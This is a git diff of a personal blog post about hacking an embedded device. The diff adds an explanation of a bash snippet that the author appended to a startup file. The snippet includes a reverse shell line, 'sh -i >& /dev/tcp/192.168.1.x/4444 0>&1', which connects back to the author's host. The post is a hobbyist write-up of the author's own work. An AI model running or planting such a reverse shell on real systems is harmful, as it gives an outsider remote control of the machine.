STulling/portfolio/content/post/hacking-embedded-devices.md

 ```

-While this looked a bit too easy to be true, I just added a couple of lines to the end of the file: [^15]
+While this looked a bit too easy to be true, I just added a couple of lines to the end of the file:
 ```bash
 sleep 60

 sh -i >& /dev/tcp/192.168.1.x/4444 0>&1
 ```
 The sleep was added since the network driver needed some time to start up.
+The second line is a reverse shell that connects to my host on port 4444, I just selected a simple one from [revshells.com](https://revshells.com).
+I could've been fancy with a bind shell which should be easier to deploy to other machines as well, but just used a revshell for simplicity.

 ### Putting it all together